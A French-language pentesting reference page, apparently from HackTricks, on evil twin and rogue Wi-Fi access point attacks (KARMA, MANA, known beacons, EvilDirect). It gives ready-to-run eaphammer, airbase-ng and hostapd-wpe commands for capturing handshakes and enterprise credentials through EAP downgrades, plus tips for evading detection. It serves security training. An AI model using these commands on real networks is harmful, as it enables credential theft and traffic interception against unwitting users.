Une attaque de jumeau maléfique est un type d'attaque Wi-Fi qui fonctionne en exploitant le fait que la plupart des ordinateurs et téléphones ne voient que le "nom" ou l'ESSID d'un réseau sans fil (car la station de base n'est pas tenue de s'authentifier contre le client). Cela rend en fait très difficile de distinguer entre des réseaux portant le même nom et le même type de chiffrement. En fait, de nombreux réseaux auront plusieurs points d'accès étendant le réseau, tous utilisant le même nom pour étendre l'accès sans perturber les utilisateurs.

En raison du fonctionnement des clients (rappelez-vous que le protocole 802.11 permet aux stations de se déplacer librement entre les points d'accès au sein du même ESS), il est possible de faire en sorte qu'un appareil change de station de base à laquelle il est connecté. Cela est possible en offrant un meilleur signal (ce qui n'est pas toujours possible) ou en bloquant l'accès à la station de base d'origine (paquets de déauthentification, brouillage ou toute autre forme d'attaque de déni de service).

Notez également que les déploiements sans fil du monde réel ont généralement plus d'un seul point d'accès, et ces points d'accès sont souvent plus puissants et ont une meilleure portée en ligne de mire en raison de leur placement vers le plafond. Déauthentifier un seul point d'accès entraîne généralement le déplacement de la cible vers un autre point d'accès valide plutôt que vers votre AP malveillant, sauf si tous les points d'accès à proximité sont déauthentifiés (bruyants) ou si vous êtes très prudent dans le placement de l'AP malveillant (difficile).

Vous pouvez créer un Jumeau Maléfique Ouvert très basique (sans capacité de routage du trafic vers Internet) en faisant :

airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon

Vous pouvez également créer un Twin Maléfique en utilisant eaphammer (remarquez que pour créer des twins maléfiques avec eaphammer, l'interface NE DOIT PAS être en mode monitor):

./eaphammer -i wlan0 --essid exampleCorp --captive-portal

Ou en utilisant Airgeddon : Options : 5,6,7,8,9 (à l'intérieur du menu d'attaque Evil Twin).

Veuillez noter que par défaut, si un ESSID dans la PNL est enregistré comme protégé par WPA, le périphérique ne se connectera pas automatiquement à un faux point d'accès ouvert. Vous pouvez essayer de faire une attaque de déni de service sur le vrai AP et espérer que l'utilisateur se connecte manuellement à votre faux point d'accès ouvert, ou vous pourriez faire une attaque de déni de service sur le vrai AP et utiliser un faux point d'accès WPA pour capturer le handshake (en utilisant cette méthode, vous ne pourrez pas laisser la victime se connecter à vous car vous ne connaissez pas la PSK, mais vous pouvez capturer le handshake et essayer de le craquer).

Certains systèmes d'exploitation et antivirus avertiront l'utilisateur que se connecter à un réseau ouvert est dangereux...

Faux point d'accès WPA/WPA2

Vous pouvez créer un Faux point d'accès en utilisant WPA/2 et si les appareils sont configurés pour se connecter à cet SSID avec WPA/2, ils vont essayer de se connecter. Cependant, pour compléter le 4-way-handshake, vous devez également connaître le mot de passe que le client va utiliser. Si vous ne le connaissez pas, la connexion ne sera pas complétée.

./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"

Faux point d'accès d'entreprise

Pour comprendre ces attaques, je recommanderais de lire d'abord la brève explication sur WPA Enterprise.

Utilisation de hostapd-wpe

hostapd-wpe a besoin d'un fichier de configuration pour fonctionner. Pour automatiser la génération de ces configurations, vous pourriez utiliser https://github.com/WJDigby/apd_launchpad (téléchargez le fichier python à l'intérieur de /etc/hostapd-wpe/).

./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
hostapd-wpe ./victim/victim.conf -s

Dans le fichier de configuration, vous pouvez sélectionner différentes choses telles que le ssid, le canal, les fichiers utilisateur, cret/clé, les paramètres dh, la version wpa et l'auth...

Utilisation de hostapd-wpe avec EAP-TLS pour permettre à n'importe quel certificat de se connecter.

Utilisation d'EAPHammer

# Generate Certificates
./eaphammer --cert-wizard

# Launch Attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds

Par défaut, EAPHammer propose ces méthodes d'authentification (remarquez que GTC est le premier à essayer d'obtenir des mots de passe en clair, suivi de l'utilisation de méthodes d'authentification plus robustes) :

GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5

Ceci est la méthodologie par défaut pour éviter les longs temps de connexion. Cependant, vous pouvez également spécifier au serveur les méthodes d'authentification de la plus faible à la plus forte:

--negotiate weakest

Ou vous pouvez également utiliser :

  • --negotiate gtc-downgrade pour utiliser une implémentation de rétrogradation GTC hautement efficace (mots de passe en clair)
  • --negotiate manual --phase-1-methods PEAP,TTLS --phase-2-methods MSCHAPV2,GTC,TTLS-PAP pour spécifier manuellement les méthodes offertes (en offrant les mêmes méthodes d'authentification dans le même ordre que l'organisation, l'attaque sera beaucoup plus difficile à détecter).
  • Trouvez plus d'informations dans le wiki

Utilisation d'Airgeddon

Airgeddon peut utiliser des certificats générés précédemment pour offrir une authentification EAP aux réseaux WPA/WPA2-Entreprise. Le faux réseau rétrograde le protocole de connexion en EAP-MD5 afin de capturer l'utilisateur et le MD5 du mot de passe. Plus tard, l'attaquant peut essayer de craquer le mot de passe.
Airggedon vous offre la possibilité d'une attaque Evil Twin continue (bruyante) ou de créer uniquement l'attaque Evil jusqu'à ce que quelqu'un se connecte (discrète).

Débogage des tunnels TLS PEAP et EAP-TTLS dans les attaques Evil Twins

Cette méthode a été testée dans une connexion PEAP mais comme je déchiffre un tunnel TLS arbitraire, cela devrait également fonctionner avec EAP-TTLS

À l'intérieur de la configuration de hostapd-wpe, commentez la ligne contenant dh_file (de dh_file=/etc/hostapd-wpe/certs/dh à #dh_file=/etc/hostapd-wpe/certs/dh)
Cela fera en sorte que hostapd-wpe échange les clés en utilisant RSA au lieu de DH, vous pourrez donc déchiffrer le trafic ultérieurement en connaissant la clé privée du serveur.

Maintenant, lancez l'Evil Twin en utilisant hostapd-wpe avec cette configuration modifiée comme d'habitude. Démarrez également wireshark sur l'interface qui effectue l'attaque Evil Twin.

Maintenant ou plus tard (lorsque vous avez déjà capturé quelques tentatives d'authentification), vous pouvez ajouter la clé privée RSA à wireshark dans : Edit --> Preferences --> Protocols --> TLS --> (RSA keys list) Edit...

Ajoutez une nouvelle entrée et remplissez le formulaire avec ces valeurs : Adresse IP = any -- Port = 0 -- Protocole = data -- Fichier clé (sélectionnez votre fichier clé, pour éviter les problèmes, sélectionnez un fichier clé non protégé par mot de passe).

Et regardez l'onglet "TLS déchiffré" :

Attaque KARMA, MANA, Loud MANA et beacons connus

Listes noires/blanches ESSID et MAC

Le tableau suivant répertorie les différents types de MFACL (Listes de contrôle d'accès aux trames de gestion) disponibles, ainsi que leurs effets lorsqu'ils sont utilisés :

# example EAPHammer MFACL file, wildcards can be used
78:f0:97:fc:b5:36
9a:35:e1:01:4f:cf
69:19:14:60:20:45
ce:52:b8:*:*:*

[--mac-whitelist /path/to/mac/whitelist/file.txt #EAPHammer whitelisting]
[--mac-blacklist /path/to/mac/blacklist/file.txt #EAPHammer blacklisting]

# example ESSID-based MFACL file
apples
oranges
grapes
pears

[--ssid-whitelist /path/to/mac/whitelist/file.txt]
[--ssid-blacklist /path/to/mac/blacklist/file.txt]

KARMA

Les attaques Karma sont une deuxième forme d'attaque de point d'accès frauduleux qui exploite le processus de sélection de réseau utilisé par les stations. Dans un document technique rédigé en 2005, Dino Dai Zovi et Shane Macaulay décrivent comment un attaquant peut configurer un point d'accès pour écouter les demandes de sondage dirigées et y répondre avec des réponses de sondage dirigées correspondantes. Cela amène les stations affectées à envoyer automatiquement une demande d'association au point d'accès de l'attaquant. Le point d'accès répond ensuite avec une réponse d'association, amenant les stations affectées à se connecter à l'attaquant.

MANA

Selon Ian de Villiers et Dominic White, les stations modernes sont conçues pour se protéger contre les attaques Karma en ignorant les réponses de sondage dirigées des points d'accès qui n'ont pas déjà répondu à au moins une demande de sondage de diffusion. Cela a entraîné une baisse significative du nombre de stations vulnérables aux attaques Karma jusqu'en 2015, lorsque White et de Villiers ont développé un moyen de contourner de telles protections. Dans l'attaque Karma améliorée de White et de Villiers (attaque MANA), les réponses de sondage dirigées sont utilisées pour reconstruire les PNL des stations voisines. Lorsqu'une demande de sondage de diffusion est reçue d'une station, le point d'accès de l'attaquant répond avec un SSID arbitraire provenant de la PNL de la station déjà vue dans un sondage direct de ce périphérique.

En résumé, l'algorithme MANA fonctionne comme suit : chaque fois que le point d'accès reçoit une demande de sondage, il détermine d'abord s'il s'agit d'un sondage de diffusion ou dirigé. S'il s'agit d'un sondage dirigé, l'adresse MAC de l'expéditeur est ajoutée au tableau de hachage (si elle n'y est pas déjà) et l'ESSID est ajouté à la PNL de ce périphérique. Le point d'accès répond ensuite avec une réponse de sondage dirigée. S'il s'agit d'un sondage de diffusion, le point d'accès répond avec des réponses de sondage pour chacun des réseaux dans la PNL de ce périphérique.

Attaque MANA utilisant eaphammer:

./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal] [--auth wpa-psk --creds]

Loud MANA

Notez que l'attaque MANA standard ne nous permet toujours pas d'attaquer les appareils qui n'utilisent pas du tout de sondage dirigé. Donc, si nous ne connaissons pas non plus à l'avance une entrée dans le PNL de l'appareil, nous devons trouver un autre moyen de l'attaquer.

Une possibilité est ce qu'on appelle l'attaque Loud MANA. Cette attaque repose sur l'idée que les appareils clients à proximité les uns des autres ont probablement au moins quelques entrées communes dans leurs PNL.

En résumé, l'attaque Loud MANA au lieu de répondre aux demandes de sondage avec chaque ESSID dans le PNL d'un appareil particulier, l'AP malveillant envoie des réponses de sondage pour chaque ESSID dans chaque PNL de tous les appareils qu'il a déjà vus. En relation avec la théorie des ensembles, nous pouvons dire que l'AP envoie des réponses de sondage pour chaque ESSID dans l'union de tous les PNL des appareils à proximité.

./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal] [--auth wpa-psk --creds]

Attaque de Beacon connue

Il existe encore des cas où l'attaque Loud MANA ne réussira pas. L'attaque de Beacon connue est une façon de "Brute-Force" les ESSIDs pour essayer de faire en sorte que la victime se connecte à l'attaquant. L'attaquant crée un AP qui répond à n'importe quel ESSID et exécute un code envoyant des balises en imitant les ESSIDs de chaque nom dans une liste de mots. Espérons que la victime contiendra certains de ces noms d'ESSID dans son PNL et tentera de se connecter au faux AP. Eaphammer a implémenté cette attaque en tant qu'attaque MANA où tous les ESSIDs dans une liste sont chargés (vous pouvez également combiner cela avec --loud pour créer une attaque Loud MANA + Beacon connue) :

./eaphammer -i wlan0 --mana [--loud] --known-beacons  --known-ssids-file wordlist.txt [--captive-portal] [--auth wpa-psk --creds]

Attaque de rafale de balises connue

Comme les balises connues sont bruyantes. Vous pouvez utiliser un script à l'intérieur du projet Eaphammer pour simplement lancer des balises de chaque nom ESSID contenu dans un fichier très rapidement. Si vous combinez ce script avec une attaque MANA Eaphammer, les clients pourront se connecter à votre point d'accès.

# transmit a burst of 5 forged beacon packets for each entry in list
./forge-beacons -i wlan1 \
--bssid de:ad:be:ef:13:37 \
--known-essids-file known-s.txt \
--dst-addr 11:22:33:11:22:33 \
--burst-count 5

Wi-Fi Direct

Wi-Fi Direct est une norme Wi-Fi qui permet aux appareils de se connecter entre eux sans point d'accès sans fil car l'un des deux appareils agira en tant que point d'accès (appelé propriétaire de groupe). Vous pouvez trouver le Wi-Fi Direct dans de nombreux appareils IoT comme les imprimantes, les téléviseurs...

Le Wi-Fi Direct repose sur la configuration Wi-Fi Protected Setup (WPS) pour connecter les appareils de manière sécurisée. WPS propose plusieurs méthodes de configuration telles que la Configuration par Bouton-Poussoir (PBC), la saisie de PIN, et la Communication en Champ Proche (NFC).

Ainsi, les attaques précédemment observées sur le PIN WPS sont également valables ici si le PIN est utilisé.

Détournement EvilDirect

Cela fonctionne comme un Evil-Twin mais pour le Wi-Fi direct, vous pouvez vous faire passer pour un propriétaire de groupe pour essayer de faire connecter d'autres appareils comme des téléphones à vous : airbase-ng -c 6 -e DIRECT-5x-BRAVIA -a BB:BB:BB:BB:BB:BB mon0

Références

TODO: Jetez un œil à https://github.com/wifiphisher/wifiphisher (connexion avec Facebook et imitation de WPA sur les portails captifs)

Rejoignez le serveur HackenProof Discord pour communiquer avec des hackers expérimentés et des chasseurs de primes en sécurité !

Perspectives sur le Hacking
Plongez dans du contenu qui explore les défis et l'excitation du hacking

Actualités Hacking en Temps Réel
Restez informé sur le monde du hacking à travers des actualités en temps réel

Dernières Annonces
Tenez-vous informé des dernières primes de bugs lancées et des mises à jour cruciales de la plateforme

Rejoignez-nous sur Discord et commencez à collaborer avec les meilleurs hackers dès aujourd'hui !

Apprenez le hacking AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!

Autres moyens de soutenir HackTricks :